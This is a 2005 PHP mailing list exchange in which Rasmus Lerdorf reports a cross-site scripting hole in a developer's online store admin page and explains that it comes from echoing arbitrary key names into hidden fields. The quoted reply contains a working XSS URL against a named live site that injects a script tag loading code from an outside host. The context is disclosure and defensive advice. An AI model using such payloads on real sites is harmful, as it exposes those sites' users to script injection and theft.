Andy Pieters wrote: > On Friday 27 May 2005 19:11, Rasmus Lerdorf wrote: > >>You have all sorts of problems at that URL. To start with, here is a >>cross-site scripting hack: >> >>http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript%09 >>src%3D%22http://3423329163/v > > > Hi Thank you! I just saw the potential for tricking users but tell me dear > boy. How can I prevent this?
Don't display arbitrary key names in hidden fields the way you are. -Rasmus -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
